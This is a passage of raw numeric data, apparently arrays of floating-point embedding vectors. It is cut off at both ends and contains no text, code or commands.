35844,-0.0059444634,-0.015259934,0.0032317706,0.0042855325,-0.017531961,0.014346162,-0.004454103,-0.017487524,-0.021623146,-0.012351206,-0.0022792877,-0.011654959,-0.00020105344,0.013478617,0.019820353,0.00260501,0.008514801,-0.010995109,0.010333636,-0.010714747,-0.0049470575,-0.009112993,0.011224989,-0.018731529,-0.032949083,-0.010710064,0.013928162,-0.0039606355,-0.0069932793,0.025921216,0.0048134997,0.027412694,-0.004987126,0.009816942,0.00606834,-0.025266767,-0.005630286,-0.0055895094,0.0027249674,0.011985571,-0.009621511,0.015936203,0.0076617007,0.0013418006,0.0042248424,0.0124953985,0.002151526,-0.014230667,-0.023387289,-0.0031014485,-0.001986714,-0.00138242,-0.010954822,-0.0074893227,0.0016561897,-0.01068172,-0.008494343,0.0023467392,0.013164839,0.02381132,-0.012999084,-0.012563941,0.01782926,-0.0033389926,-0.0005666756,-0.0192979,-0.014779235,-0.086786635,0.0030472453,0.009422147,-0.009592666,0.016275758,0.02187793,-0.035718676,-0.005201514,-0.008693034,0.011599983,-0.0022904703,-0.007005556,0.0006369774,0.009880845,-0.008597518,-0.022425981,-0.002363798,-0.0020843432,0.0027143646,0.011213924,0.008551794,0.020989273,0.015122171,-0.004339238,0.012351749,0.005992558,-0.015162625,0.0046922523,-0.01756419,-0.009075284,0.0048864316,-0.014779504,-0.0034723678,-0.009168332,-0.015135914,0.0049416707,-0.0031240408,0.018763803,0.021940744,-0.018777581,-0.003760134,0.0034746455,0.018938337,-0.006987048,0.008018768,0.03571981,-0.012453431,-0.029881207,-0.020314723,-0.0065203332,0.025559492,-0.0020240725,0.0071928804,0.015121075,0.021420464,0.00019948996,0.0060955584,0.0021450305,0.013857369,0.008333073,-0.014630343,0.0044434345,0.016074756,-0.0007410303,-0.00034719965,0.01464319,-0.0032533144,-0.0062347357,-0.024135986,0.0025088445,0.0051994002,-0.012153429,-0.020430265,-0.011459848,-0.0019306089,0.016061794,-0.0068313326,-0.0109179,0.0068542203,0.00886037,0.04030919,0.005166576,0.004319071,0.00072561676,-0.015021718,-0.012311901,-0.028129756,-0.0014998986,0.0022505352,0.005131154,-0.009371575,0.019696323,0.0041952035,0.007495207,-0.0057783048,0.03488266,-0.008075784,-0.017592298,0.022506457,-0.013630666,-0.0055746553,-0.002090143,0.00174415,-0.006141337,0.0023064767,-0.015411737,-0.006859865,0.011548888,0.01001242,-0.00092921767,-0.016497638,0.010286846,0.010163078,0.025411023,0.014188011,0.014237474,-0.015630895,0.021750297,0.0016470867,-0.013167223,-0.016938457,-0.034190927,-0.018607447,-0.011256838,0.011833237,-0.009100356,0.025439646,-0.0135729015,-0.022456344,-0.0042268955,-0.0058895857,0.017488724,0.025313132,0.009177195,-0.010402327,0.00031024936,-0.030932382,0.017765027,-0.006750511,-0.00032233197,0.0044194083,-0.023626355,-0.003939539,0.014510936,-0.0044241506,0.02376084,-0.019851357,-0.0038565784,-0.016184421,0.006320072,-0.0036392424,0.014049397,0.02259485,0.016463822,0.0001249234,-0.0069936444,0.010040202,0.007929245,-0.011935946,-0.0027295204,0.003466758,-0.0020275812,0.018009981,-0.00945946,-0.0015243456,-0.0138962,0.008295011,0.004202051,0.0068901554,-0.027754528,-0.0061214436,-0.0032371262,0.006537171,-0.003916009,-0.012810209,0.016102297,0.004861889,0.012176125,0.0022432497,-0.021133183,-0.0069703255,0.0025291843,-0.0076405928,-0.0047484213,-0.010853186,-0.00881395,-0.015695576,-0.037464444,-0.009320438,-0.022240791,-0.0074611963,0.00079597946,-0.0009049089,0.020242082,-0.009591905,0.011498456,0.0097293025,0.010966406,0.00857517,0.01251349,0.00019710397,0.005970443,-0.008163553,0.008866369,0.0017116624,0.0032054358,0.0013002056,0.003151254,-0.0024317126,0.0009405284,-0.0016637667,0.0076186927,-0.0050515523,0.120218515,0.022865104,-0.011907183,0.0134290075,0.014472228,0.019409802,0.032441296,-0.0017295304,0.011371266,0.018609298,-0.0051900633,0.003177626,0.0034690888,0.0018360742,0.014059785,0.014509849,0.022464026,0.022832585,0.001959005,-0.0061077797,0.039086778,-0.01902428,-0.0110617615,-0.025919743,-0.00046011517,-0.03129696,0.0021519307,0.03102839,-0.00811129,0.001227724,0.014262162,0.0063318694,0.011862363,-0.0043656426,0.0037293918,0.00432931,0.013723725,-0.010919462,-0.0052868607,-0.0038240268,0.011930042,0.005903464,-0.0069607366,-0.007286013,-0.02047379,0.0065168645,-0.0037040084,0.012950098,0.011746341,0.0035168638,0.026015578,0.018684879,-0.0143705895,-0.012673452,-0.004398186,-0.009769248,-0.007999623,0.0063639362,-0.007947162,-0.012677263,0.033399384,-0.036381043,0.0021156152,0.011377245,0.02587882,0.00087427715,-0.017846404,0.008633677,-0.042933013,-0.029500077,0.016691562,-0.012850277,0.005522917,0.0041400697,-0.0066660256,0.0072886627,-0.0027466554,-0.02084833,-0.011253135,-0.009047066,-0.013490507,0.009123778,-0.013735499,-0.008397128,0.0084891375,0.0069289305,-0.009177977,0.001823683,0.0037112825,-0.0008889185,-0.0020698542,-0.007716377,0.020196196,-0.009476839,-0.004622663,-0.012158678,0.007943114,-0.017651517,0.012328967,-0.0018740236,0.009818143,0.0048503573,-0.004754383,-0.008682382,-0.030759411,-0.021189483,0.0018002293,0.02857898,-0.007338422,0.0070730518,-0.005616243,0.0046922904,0.012262688,0.018135458,-0.011790503,-0.00268494,-0.009796071,-0.018174509,0.016241502,-0.008828962,-0.00124944,0.01219332,0.012822454,0.006790536,-0.0013370148,0.00078448764,-0.0119661745,0.0051940363,0.01083704,-0.0062247333,0.013631765,-0.027430588,-0.0119063705,0.02323653,0.0052962187,0.006999838,0.0069753886,0.009340558,0.00096972316,0.022212435,-0.013434257,0.007706865,-0.018203305,-0.0017728029,0.009668517,0.0090322355,0.03386147,-0.008094749,0.0126633365,0.010627625,-0.00701917,-0.0066342806,-0.004352856,0.00813827,-0.018012006,-0.034646954,-0.0019361558,-0.0032869275,-0.022943333,0.002413712,0.000122059784,-0.0063214703,-0.004405035,-0.036992904,0.0034578622,0.010569083,0.011953206,0.008553475,0.010197083,0.005289246,-0.02338154,0.025449831,-0.0035782475,0.010708359,-0.018746335,-0.004395177,0.012718774,0.00024282285,-0.019437427,-0.0021146634,0.0019839737,0.017085915,-0.00509991,0.009257353,0.018004274,0.0063860957,-0.010334662,0.009918996,0.0018625075,0.04578329,0.0007602598,0.013607087,0.0033878216,0.013868466,0.00033267372,0.005558017,-0.030807802,0.045704026,-0.009384616,-0.040200867,0.0075285626,-0.0064323526,-0.011207389,-0.008747577,-0.0016636536,-0.0030436935,0.0083896415,0.016317885,-0.01980697,0.011004585,0.0058719376,0.023872033,0.027241537,-0.0066133062,-0.0011927867,0.01609279,-0.022834161,0.0033667223,-0.024441995,0.0054425527,-0.0037418336,-0.012542984,-0.032539412,-0.010026446,0.0069614933,0.00090384064,0.0067968504,0.030060919,0.01672139,-0.023801556,-0.004373806,0.007366628,-0.010755955,0.0031465576,-0.0016975728,-0.00029654393,0.026961746,0.019272126,-0.0033626826,0.0062618633,-0.0061282436,-0.0014335541,0.002453484,0.0030174837,-0.0123730125,-0.0038666248,-0.010511211,0.007335671,-0.0027095233,-0.02005459,-0.032434147,0.015880955,-0.009990824,0.005089294,-0.009595086,-0.010788374,0.004168498,0.009336554,0.007374067,-0.0028694358,0.014539342,-0.004570757,0.023796473,0.020982057,-0.012186036,-0.0030031453,0.00830136,-0.006076595,-0.011716667,-0.008599785,-0.018789925,-0.002949862,-0.016374977,-0.010763,-0.010943348,0.009370393,-0.010377668,-0.014213821,-0.012164063,-0.0018768078,0.0074358857,-0.011456648,0.021441726,-0.017758578,0.012005661,-0.00475232,0.016365545,0.0047520185,0.04149421,-0.054085836,0.011421969,0.004987562,-0.011315776,-0.008527089,0.0014184073,-0.0135732675,-0.07056956,-0.010492893,0.04543469,-0.018710393,-0.0035557584,-0.02437863,0.014914052,-0.009769968,-0.014459936,-0.0055483924,-0.0070638126,-0.013644062,-0.0015132797,0.005838987,0.0204806,-0.000003743736,0.016336065,-0.0129990885,-0.007704239,-0.016898269,0.012126837,0.017228873,0.013303867,-0.007650173,0.017324263,-0.02515461,0.011557773,0.011957799,0.008360463,0.0031459748,0.0070213643,-0.008044766,-0.016864052,-0.025714753,0.003561102,0.0039288937,0.0070953695,-0.020618519,-0.014304987,-0.0028015901,-0.0064519956,0.18516073,0.006811789,-0.006972209,-0.016138142,0.008301413,-0.016614342,-0.011403484,0.006484914,0.0038753566,-0.009437323,-0.016940119,0.006795344,0.0011108884,-0.009001928,0.01908692,-0.027466275,0.0046860296,0.14513947,-0.00978969,0.01208126,0.003228577,-0.0076674726,0.02158355,0.017711753,0.0051782145,-0.076479234,-0.007552426,-0.039777488,0.013616192,-0.002309119,-0.009015708,0.035229534,-0.008438448,-0.013131421,-0.00889218,0.022409001,0.0035130829,0.0018378691,-0.039968397,0.013491348,0.007700018,-0.006385973,-0.009538552,0.004920647,0.012111068,0.00036229313,-0.014656464,-0.0000100847,0.020353297,0.02406895,0.015848463,0.012974483,0.014020416,-0.021076158,0.0019788323,0.023052651,-0.0077269394,-0.013416387,-0.0092299525,0.022680404,0.013238289,0.016475057,-0.010366281,-0.002281048,-0.020666577,-0.016323209,0.0024673392,-0.016830297,0.0012601907,-0.0108111575,0.002131702,-0.0029467675,-0.003819726,0.016254118,-0.011517068,-0.013619668,-0.016642233,-0.023976479,0.004114087,-0.026805518,0.034977913,0.04098624,-0.0096360855,-0.0035621324,0.017350683,0.019235548,0.0004954311,0.007691631,-0.0015995144,-0.011653061,-0.0011363273,-0.0032004882,-0.007394338,-0.0014317542,0.0025938933,-0.0067297234,0.0013496437,-0.0022999696,-0.014720185,0.0027568678,-0.02799662,0.022678101,-0.0035720794,0.009045735,-0.021433804,0.018878996,0.009436452,0.0027796666,-0.0019093931,-0.0043422566,-0.008085665,0.006176955,0.018118287,0.02097777,-0.0012759804,-0.015072513,0.00917288,0.0035322967,-0.023595171,-0.0012152897,-0.010063183,-0.01863157,0.018897897,0.00017049989,-0.029996043,0.0022103952,-0.01277956,0.010919616,-0.014355612,-0.017100366,-0.0129072545,-0.0046820776,0.0033106692,0.037939917,0.016716544,-0.011879753,0.009264082,-0.013227895,-0.004786429,0.001824897,-0.0021646793,0.01264457,0.0046639,0.008657258,-0.007653575,-0.0023664136,0.017119242,0.010188051],[-0.010113813,-0.011119201,-0.014901928,-0.011136484,-0.006789053,-0.04142023,-0.011910298,0.011742465,-0.0047541037,-0.016719412,-0.001811232,0.030713944,-0.005355379,0.011938707,-0.0068789967,-0.01501694,0.008913365,0.0062763244,-0.0042887917,-0.0052073803,0.014781,-0.005737278,-0.0030544335,-0.000416348,0.010171238,0.015161235,-0.010007062,0.005168986,-0.0056584477,-0.0028275067,0.021884914,0.015329744,-0.0064823716,-0.009686955,0.023226725,-0.013335942,-0.012623464,0.017255679,0.004755474,0.00881096,-0.0014118691,0.006448033,-0.01740793,0.0050514685,-0.012498761,-0.013116321,-0.014742109,0.006902067,-0.012555974,-0.001686964,-0.005955339,0.0012616856,-0.015446941,-0.0028913487,-0.018847458,0.03578213,0.0016337908,-0.025760828,0.008420448,-0.0003992042,-0.021771308,0.020323984,0.0073253918,0.0039532934,0.046936464,-0.014765838,0.012259507,-0.001522778,-0.024752956,-0.0019660022,0.02336227,-0.008494668,0.007576368,-0.0057185683,-0.016607184,0.033148907,-0.0053473334,-0.0071333265,-0.010886641,-0.0068867593,-0.030870613,0.0027116395,-0.002444488,0.0016076283,0.022995556,0.008083923,0.01220248,-0.007951438,-0.012162461,-0.009250899,-0.0273533,-0.00035530614,-0.0016881765,-0.005267364,-0.010256667,-0.003467466,0.028876554,-0.013946496,-0.0017985714,-0.01489053,-0.024856605,-0.0057678805,-0.027803777,0.009107545,0.004744427,-0.0124807935,-0.0037619027,0.0035774144,0.0066730357,-0.0026580463,-0.014761098,0.019350132,0.0097595295,-0.0075561036,0.0016174904,-0.020481352,0.0035899242,-0.006848583,0.0034851474,-0.012148974,-0.0073024724,0.012309787,0.02722243,-0.011325558,-0.0031610886,0.0017552762,0.021674965,0.014581082,0.0016664261,-0.0026697745,-0.0033095414,0.013119376,-0.0022870118,-0.00090506807,-0.017249066,-0.0053138044,0.005274115,-0.014699016,0.004726008,-0.027870834,0.011574347,-0.0042210417,0.009560113,0.015240623,0.004583409,0.008948505,-0.0032066884,0.023253089,0.0025013383,0.01018036,-0.0069370437,0.015000884,0.0072435625,-0.015474933,-0.0050362106,0.009799917,-0.018676832,-0.014036318,-0.01164537,-0.00040497753,-0.0030849995,0.0014832399,-0.011187111,0.0056598205,-0.0021511028,-0.017810643,-0.012382122,-0.0017873098,0.0025659334,-0.001503412,-0.002385914,0.018647978,0.022931,0.0074781864,-0.008772419,0.014235624,0.008300691,-0.014362377,-0.014352742,-0.012186932,0.0035555025,0.013898111,-0.016075535,-0.013420491,0.02006176,0.00910086,0.011179302,0.018087644,-0.0014571612,0.014365127,0.0023540403,0.002318953,0.0038769688,-0.022378916,-0.015566137,0.0056133596,-0.010122364,0.13488327,-0.01436217,-0.009566153,-0.02429601,-0.007348025,0.02103683,-0.011741036,-0.013156432,-0.0069846464,-0.01904835,-0.0059204083,0.008672155,-0.0034663412,0.012908322,0.0045863693,-0.004347976,0.023208465,0.0026245222,-0.055187058,0.01227534,0.0072776317,-0.038290936,0.006165542,-0.0073070936,0.011383255,-0.010773717,-0.012401934,-0.0122241415,-0.004917745,0.008471143,-0.010071792,0.013810353,-0.027607648,0.012504228,0.010577408,-0.035935458,-0.0199836,0.00026024322,-0.032073878,0.020753017,-0.010459973,0.0045656958,-0.002275286,0.01220847,0.0073518674,0.015383797,0.02232223,-0.005427009,-0.012231124,0.01779412,0.0032234904,-0.0016946415,-0.0065299342,-0.0053545553,0.006449388,0.004976266,0.0033019024,0.006243738,-0.02344488,0.0011933054,0.012442832,0.0076661464,0.019500462,0.009866222,0.01671392,-0.007993194,0.017558204,0.0124880355,0.015496215,0.020101253,-0.046648476,-0.024802936,-0.01321651,-0.027313659,0.015311802,-0.010177502,-0.024783846,0.009051262,-0.013063257,0.031529564,0.0042291926,0.004170904,0.011752752,0.0032126459,-0.011680313,-0.008481758,-0.0034583875,-0.034831006,-0.008952441,-0.0003443346,0.0050737937,0.03225062,0.0027618797,-0.0005788057,-0.006731832,0.004667599,-0.004054119,0.002876817,-0.007834415,-0.028387014,0.004636336,0.010463944,-0.019468743,0.0027612436,-0.011719119,0.027094679,-0.004509387,-0.0152755575,-0.012830553,0.0071401005,0.04115872,0.002698047,0.011253515,-0.017847028,-0.023263723,-0.011699007,-0.004753521,0.016418947,-0.0150498,-0.011173055,-0.0058129025,-0.00019833482,0.0203175,0.011841172,-0.0018194279,-0.018657612,-0.016242877,-0.009546996,0.014376063,0.022951148,-0.00022284113,0.0024557172,0.020684553,-0.008800993,-0.0049502854,0.025408452,0.008004766,-0.018365735,0.016025806,0.0028992835,-0.012500385,-0.0058841626,0.016006783,0.0007067925,-0.02147662,-0.01492559,0.0034117964,-0.005791968,-0.0009265911,0.008921724,-0.008113612,0.016773764,0.0053907186,0.012938096,-0.0032705176,-0.011077714,0.0055803666,0.016604207,0.015767124,-0.009190996,-0.011009466,-0.014291275,-0.019846432,0.04212517,-0.012694433,0.0057479483,-0.015861113,0.08792858,0.010243454,0.0098144505,0.022341304,-0.035772294,0.0039529717,0.012928249,0.030087521,-0.008185448,-0.017603569,-0.0031003198,-0.019483006,-0.0058075716,0.025943361,-0.0012230098,0.0129602095,-0.009774458,0.0066869594,-0.035779603,-0.008340942,0.03097712,-0.0020700637,-0.021789512,0.012268427,0.010885085,-0.012188253,-0.0041584843,0.003641425,0.00023169241,-0.008751832,-0.006012594,-0.023671055,-0.027412698,0.0064644017,-0.028555999,0.0135936625,-0.0064811273,0.004427953,-0.02370947,-0.01347489,0.000121944955,0.004845963,-0.011542484,0.012420917,-0.006552439,0.021613695,0.021206347,0.012485477,-0.013131119,0.01228331,0.0010559598,0.0020203374,-0.014329635,0.029983861,-0.0021153255,0.001974922,0.018842543,-0.03187721,0.010336456,0.017269207,0.029422805,0.011881896,-0.025922626,0.0311194,-0.009074201,0.01957023,-0.002528933,-0.010972498,-0.014065583,-0.015337344,0.000105223626,0.015907185,0.0139662465,0.007836378,-0.0129147945,0.0037998313,-0.0014073681,0.0082096765,-0.00031027486,-0.04399439,-0.0043850904,0.019453006,0.00074151374,-0.013478548,-0.005359943,0.002957999,0.019218264,0.0019149401,0.021502288,-0.006540065,0.024767496,0.0059238262,0.004142097,-0.015799347,0.0024886923,0.002618122,0.027313111,0.006037991,0.0037423938,-0.0032200788,-0.027696602,-0.005526824,-0.014616016,-0.011540701,0.0006535896,0.004007112,-0.0045883735,0.008470657,0.0019068712,0.035819765,-0.011726546,0.010782193,-0.01959287,0.012920495,0.032712433,-0.010102002,0.00035083445,-0.012657744,-0.021070706,0.019229347,0.024283063,0.013145618,0.016086813,0.01153438,0.0050265607,0.021078058,0.0046599978,0.011754266,0.0034226703,0.015310811,0.02255293,-0.00090062286,0.008048708,-0.035531286,-0.011258475,-0.0011681482,0.012824667,-0.028135916,0.023709869,0.014506917,-0.007089254,0.019874893,0.01924441,0.027169563,-0.0016675609,0.014493028,0.0003446183,0.0046232403,0.010760881,-0.0028853593,-0.0041015674,-0.016039232,-0.010197844,-0.012432762,0.004142455,0.021024974,0.005382344,-0.0020466042,-0.009198725,-0.00067142065,0.034323506,-0.0118681295,0.017963182,-0.01430504,-0.0051827705,-0.00570353,-0.0033868314,0.08424936,-0.006826421,-0.017187715,0.0050747404,-0.00096057466,0.0027187385,0.01720083,-0.00055103557,-0.027437521,0.028318202,0.001943945,0.01878564,0.005835395,0.020079011,-0.013835392,-0.027108742,0.000061578365,0.013612249,0.014066173,0.014816243,-0.00580024,0.0062736208,-0.01038691,-0.026702756,-0.013647359,-0.0064980863,0.009915219,0.021908533,0.026370432,-0.0004318901,-0.00638099,0.018870853,0.0033872784,-0.0077888225,0.030844059,0.009112237,0.00947766,0.0098699415,-0.015206857,0.022288274,0.008735673,-0.015785852,-0.00790867,0.031800393,0.0074489154,-0.01444562,-0.021411145,0.0102726305,-0.0035594837,0.018471345,-0.012177748,0.012355879,0.012933487,-0.0043111206,-0.010414843,-0.00951433,0.020051438,0.014212678,-0.011042838,0.019874554,0.0008259912,0.0060835727,-0.010692529,-0.0020009389,-0.014809515,-0.0074176323,0.004454499,-0.001651329,-0.004782706,-0.016265921,0.019952897,-0.0010955365,-0.0036525268,-0.008169597,0.024286147,0.015325534,0.01683392,0.029017743,0.020936823,-0.012657914,-0.0074066427,0.01705405,-0.008790211,-0.018129312,0.017827323,0.021452675,-0.016970467,0.009365989,0.012376383,-0.002483066,0.02120231,-0.007153919,-0.012601815,-0.025522448,-0.004313573,0.01594481,0.00027046274,-0.01181756,0.00022140089,-0.0005542579,-0.013696905,-0.014783624,-0.009978778,0.02006,0.0013172323,0.0074262875,-0.011396232,0.012122951,-0.0118587,-0.009759523,-0.00898986,-0.06620347,0.011960404,0.013062392,0.029018557,-0.01879218,0.03407955,-0.0027166412,0.008549954,-0.007264811,-0.004522063,-0.010304486,0.002989881,0.008236345,0.010668626,0.029859308,0.012607606,-0.017405214,-0.023180077,-0.00213982,-0.051059067,-0.016570715,0.033544447,0.0013004271,0.010565486,-0.00072110066,0.008208109,-0.020586614,-0.017985722,0.012214788,-0.012801041,-0.0052815382,0.01467014,0.011702364,0.0052331053,0.0026311975,0.009271863,-0.014852117,-0.0012054505,0.0012313782,-0.0031779932,0.02414097,-0.009719447,-0.036164574,0.009034328,-0.026070837,0.024416594,-0.0049397657,0.014645579,-0.010444043,0.039174628,0.0026821261,0.001646289,-0.009277717,-0.0030727102,0.013914765,0.022612363,-0.00847259,0.010908781,-0.0091892835,0.00002859481,-0.010074596,0.016159412,-0.01610978,0.00096379913,-0.012006991,-0.0065480727,-0.0066770623,-0.013956748,0.003779397,0.013872217,0.017413571,0.022559583,0.018583912,-0.0014846566,0.031821012,0.004744456,0.0005481523,0.000459634,0.0010935338,-0.012371384,0.0074013565,-0.020582823,-0.0044837203,0.019953001,0.03143224,-0.0044309804,0.016695641,-0.010537329,0.009739247,-0.0063430257,0.009092517,-0.005737902,-0.009599821,0.0060756407,-0.0018339222,0.01475786,-0.008850832,-0.029038427,-0.022691319,0.027205685,0.032361522,-0.030184798,-0.018853117,-0.0044356235,-0.007947189,-0.010726452,-0.027323123,-0.010892413,-0.0063306442,0.010754834,-0.011865752,0.023356222,-0.00038010685,-0.00449004,0.028698107,0.018559007,0.0039808434,-0.0024590646,0.0047661103,-0.016702542,-0.0023063812,0.017532546,-0.003960367,-0.035919584,-0.010545594,0.009074967,-0.016257651,-0.017215304,0.0043519433,0.020975191,0.030778661,0.002178835,-0.0057746316,-0.009178266,-0.01618508,-0.00404103,0.009488173,0.002318472,-0.018620031,0.0070571415,-0.0071521234,-0.010617251,0.01909139,-0.026312336,0.022966646,0.0060441466,0.0026815517,0.016113618,-0.011123928,-0.014263513,0.011145919,0.0031452652,-0.012029547,-0.0005596376,-0.022876555,0.013148297,-0.0147106135,-0.0046992176,-0.0034100057,-0.021054303,-0.015139367,0.001997496,-0.0016266082,-0.015636934,-0.0040455433,-0.004139607,-0.04003255,0.013770623,0.002900886,0.0075162738,0.016122926,0.017517377,-0.009556292,0.000047462312,0.010040275,-0.021761455,-0.029698657,0.004300147,-0.006259825,0.008270694,-0.0035847106,-0.030643348,-0.0324989,0.0014970892,0.012180788,0.018371204,0.008171941,0.0134604825,0.0012835723,0.0011172323,-0.0011274627,0.0013805047,0.00801917,-0.031933133,-0.004951537,-0.013380784,-0.001289881,-0.0125715565,0.029938845,-0.011665009,0.047045287,-0.00770201,-0.01812909,0.016535638,0.013217779,0.015793134,-0.0013335438,0.0015809074,-0.0007168017,-0.020181336,0.011724496,0.0047298027,0.01064308,0.018713944,0.019901678,0.008438082,-0.004511461,-0.006181742,-0.021065008,-0.004001417,0.02634133,0.00010625639,0.012388845,0.0021339934,0.013005164,-0.017092595,-0.017119363,0.014139631,0.0058379974,-0.0044526802,-0.0011564195,0.00868605,-0.03007848,-0.014905714,-0.010969018,-0.009134674,0.0042198333,-0.0020719632,-0.0056309844,0.002869079,0.014905706,-0.004317274,-0.0056961062,0.007871473,0.0005820849,0.0011501391,-0.013825426,-0.014052528,-0.010701593,-0.02708194,0.017172515,-0.03678816,-0.008183246,0.0023056709,-0.010151025,0.026329193,-0.037728265,0.0036465628,-0.010223848,-0.0010367294,0.010452347,0.024647797,0.0148398345,-0.011255973,0.021122612,0.02118139,0.021983609,-0.01055626,-0.01946935,0.025506595,-0.0047694305,0.028804563,0.0022535152,0.030596934,-0.00980986,0.011230427,0.015860643,-0.024931587,0.009490387,0.0019059078,-0.005412058,0.007215279,0.03918519,-0.013069147,0.029743128,-0.019226434,-0.0027435366,0.029764235,0.0064037056,-0.0066093206,-0.010832763,0.0022882218,0.008072393,-0.012050786,0.010115893,-0.00568206,-0.08502717,0.026858859,0.007737613,0.005223974,0.0030694848,0.013119452,0.011913906,0.007756484,0.041819416,-0.010769256,0.0070564006,-0.0039486275,-0.010021587,-0.0028666742,-0.0002980311,-0.017396746,-0.020519042,0.0059414883,0.02889502,-0.023249557,-0.013896711,-0.004571383,-0.009122347,0.0032601752,0.014507273,-0.0041798684,0.01476753,-0.013483731,-0.014518803,0.016041132,-0.0016042404,0.0032341157,0.0033002645,-0.005453952,-0.0135626225,-0.018042173,0.0140689425,0.013916823,-0.020024864,0.0203364,-0.022176031,0.008058008,-0.005506851,0.025554195,-0.0077473563,-0.020167068,-0.020513216,-0.029303169,-0.013911615,-0.020860257,0.021278044,-0.010764707,-0.020649105,0.017386796,-0.010000095,0.014831089,0.019221764,0.0113107255,-0.008686274,-0.014716625,-0.0024282245,-0.0032800226,0.0040548514,0.005855893,-0.0248805,-0.016462857,-0.006679086,0.03499457,0.00795062,-0.0031083236,-0.004248225,-0.0077825785,0.0013995657,0.0062208776,-0.008701628,0.021680152,-0.008585432,-0.008187936,-0.0064531374,-0.023189597,-0.014004328,-0.013536022,-0.012423233,-0.005839226,-0.033215377,0.021037804,0.008280895,-0.0043206858,0.017658954,-0.010032398,-0.0034840552,-0.0042758877,-0.011109685,0.014903106,-0.0007794049,0.036239505,0.01666318,0.024269098,0.0020069387,-0.008805909,0.031232134,-0.010549661,-0.020712236,0.042289726,0.008819923,0.0006907889,0.008494784,-0.0068835244,0.014159223,0.022327846,-0.005325215,-0.009284672,-0.0014195081,-0.001335357,0.026665129,-0.000089706984,-0.0053492817,0.014244599,0.01438993,0.009149883,0.0136545,-0.019901592,-0.006309279,-0.00016231301,0.020274784,-0.00043169456,0.015477549,0.008883479,-0.018223714,-0.0015294827,0.005745819,-0.00562991,-0.009807421,-0.0018936129,0.002593432,-0.0019357495,-0.01855456,-0.009096429,-0.004251951,0.010378097,-0.017371407,-0.013009939,-0.03286633,0.015001207,0.013099947,-0.009129989,-0.0040808422,-0.01171233,0.0067545315,0.027251454,0.0009810289,-0.002510397,-0.01395978,0.0041971444,0.0005123651,0.025849547,-0.008642531,-0.00015322126,0.0017200906,0.02092727,-0.030718246,-0.012380861,-0.0012255306,-0.009290929,-0.036897242,-0.005624066,-0.012832581,-0.015780583,-0.018723203,0.004145015,0.0066978857,-0.004997591,-0.008644259,-0.0033464204,0.018878654,-0.0051048133,0.022727095,-0.009335806,-0.02818028,-0.004445511,0.027959136,0.027041106,-0.014720901,0.0021996966,0.0005582309,-0.020416828,-0.009315769,-0.007225303,-0.018857595,-0.0031377324,-0.009389648,0.027160924,0.015659243,0.016253866,-0.007474606,0.006801612,0.0034258934,0.020754075,0.0027060346,0.021386376,-0.0049695238,0.025812263,0.014418636,-0.014039937,-0.022365062,-0.00093037,0.0027535171,-0.013716783,0.001804107,-0.0008311742,0.012525099,-0.016911626,-0.001793243,0.029207552,-0.008443515,-0.014765813,-0.011008228,-0.019909747,0.002424386,-0.030333519,0.031778317,0.007467521,0.001687106,-0.019394888,-0.011007643,0.00021403594,0.01910687,-0.008426002,-0.013470119,0.013018773,0.02212611,-0.031311568,0.021969281,0.0021809214,-0.023719236,0.019064225,-0.009976912,-0.025198063,-0.012760551,-0.023637036,0.023539966,0.027169202,0.0055080503,-0.00007606543,-0.0038730896,0.029324401,-0.02057388,0.0012703052,0.012405114,0.0029025648,0.0033808334,0.009358454,0.011938047,0.0030293926,-0.023978818,-0.003248573,-0.01252168,-0.0088876365,0.0072502373,-0.005919024,-0.011013815,-0.0222321,0.007560468,0.0006441522,0.02042863,-0.0072387047,0.007735536,-0.02705469,0.0014680284,-0.016851537,-0.0062335255,-0.018373394,0.022999762,0.012440273,-0.0027989063,-0.0046365694,-0.029600002,0.0072177853,0.00009745877,0.008656195,0.017043525,-0.004087583,0.02299435,-0.022583963,0.033598185,0.00768343,-0.0035305296,-0.027996792,0.014018776,-0.0074056257,0.0022526896,-0.0022842737,-0.014377308,0.016497009,0.0037745724,-0.011154105,0.009849454,-0.0055622593,0.016476357,-0.017277092,0.07667984,0.0068961247,-0.0035978856,-0.007996006,0.005500513,-0.022100912,-0.0029488057,0.00064750947,-0.0009892336,0.000003320864,-0.024225716,-0.021550253,0.003232721,-0.035153326,0.002240858,-0.0022795105,-0.0046128477,0.012088237,-0.006270466,0.0131068565,0.0073678493,-0.028879905,-0.0031452023,0.016359178,0.015545749,0.017132463,0.020374086,-0.00219813,-0.02392872,-0.017551592,0.0108889695,-0.014997828,-0.0017410805,0.022476083,-0.0023486526,0.014998025,0.0047536623,-0.030818593,-0.017284147,0.015943686,-0.011234275,-0.006696151,0.06833337,-0.010680536,0.016490165,0.0014224339,-0.010456957,-0.0056483233,0.030673001,0.013700415,-0.0032688128,0.025335694,-0.006128122,0.011114934,-0.0051826905,0.030505436,-0.00337893,0.020164639,0.01696817,0.009169888,0.014332674,0.0065352004,-0.0034459482,0.013233251,-0.040476657,-0.03070944,0.021677904,-0.0056217033,0.004213359,-0.007477135,-0.009757911,0.0028204534,-0.0253882,-0.028447546,0.004793399,0.007810601,0.027909093,-0.013691346,-0.010422444,0.0067608086,-0.01351807,-0.014791692,0.036696278,-0.0054030092,-0.0011745336,-0.01961747,0.010599695,-0.01113629,0.109418824,0.026480764,0.040255003,-0.020938009,-0.006421485,0.017451143,-0.005597373,0.020447545,-0.009032979,0.0017802726,0.009580851,0.017193912,0.0035056516,0.011996576,0.005720254,0.00069735193,-0.00001193116,0.008046566,0.011391962,-0.006750662,0.002947094,0.015153228,0.024485966,-0.0016576105,-0.012745098,0.028197609,-0.0054793553,-0.01152244,0.0042188927,-0.021556975,-0.011023816,0.0007897173,0.014653413,0.010803104,0.0121019585,-0.036106896,-0.00023553839,0.198112,-0.011301988,0.0042269267,0.013163995,-0.008135438,-0.015138321,-0.1062521,0.0008865947,0.015207845,-0.0074150255,-0.0077476115,-0.008187888,-0.0033684713,0.03140336,0.017181043,0.014314196,-0.005182115,-0.017131522,0.012876536,-0.019043079,0.013019586,-0.013264354,0.026009705,0.0033603574,-0.016778566,-0.0070766346,0.021164544,0.0051722378,-0.009864737,0.003467478,0.005433437,0.009604945,0.012004864,0.0036221768,-0.026139006,0.011467889,0.015084646,-0.0005586372,-0.009936334,-0.00763926,0.0011900788,-0.0034988287,-0.009995007,-0.022095855,-0.17375338,0.0066170315,0.013662281,-0.021681475,0.0066461707,0.0082016215,0.008480583,0.01785007,0.008011116,0.012621019,-0.01704058,-0.010642026,-0.00797529,0.010628155,0.0062852977,0.0013992217,-0.012667558,-0.016957074,0.012747403,-0.017637743,0.023075871,0.0132846255,0.0032539193,0.00026429782,0.012146177,0.0029429717,-0.01619122,0.022346599,-0.009158555,0.015480284,-0.005196269,0.012254531,-0.01787